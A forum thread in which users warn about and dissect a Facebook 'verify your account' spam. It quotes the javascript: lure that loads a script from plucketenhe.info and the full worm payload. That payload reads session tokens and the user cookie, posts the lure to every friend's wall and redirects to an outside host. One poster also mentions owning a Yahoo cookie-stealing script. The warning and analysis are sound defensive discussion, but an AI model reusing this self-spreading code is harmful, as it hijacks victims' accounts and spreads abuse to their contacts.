Another Facebook Scam/Spam

[Metapod]

This was posted to my Wall earlier today...

In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...

The "verification" link is...

Code:

javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

First of all, I don't have protection on my browser right now so... not going to check that out. But the domain plucketenhe doesn't sound legit. So I wouldn't recommend clicking this.

Edit: At the moment, it appears that 3 people have posted to my wall from iPhones.

[Deltron]

Facebook spam these days are become quite meticulous. The link being next to that of the Like and Comment buttons make it even more believable.

Thanks for the heads up.

[Gaijin]

Gets your friends and spamms their walls.... Looks like o.O

Code:

var message = "In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "==>[VERIFY MY ACCOUNT]<==";

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
    data = eval('(' + gf.responseText.substr(9) + ')');
    if(data.error){ }else{
        friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
    }
}
for(var i=0; i<friends.length; i++){
    var httpwp = new XMLHttpRequest();
    var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
    var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
                   "&post_form_id=" + post_form_id +
                   "&fb_dtsg=" + fb_dtsg +
                   "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
                   "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
                   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
                   "&user_message=" + message;
    httpwp.open("POST", urlwp, true);
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");
    httpwp.onreadystatechange = function(){
        if (httpwp.readyState == 4 && httpwp.status == 200){
            
        }
    }
    httpwp.send(paramswp);
}
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";

[Metapod]

What does this do?

alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";

[Gaijin]

What does this do?

alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";

It's a fake error, and redirect to the same page again, http: //plucketenhe.info but it didn't load....

[HCrew]

fb viral script

[Telhast]

Scripts like these are usually developed to steal cookies stored in your browser. I currently have one that steals cookies stored for yahoo and hence giving access to their account. I will analyze this script and edit this post and update you with my findings.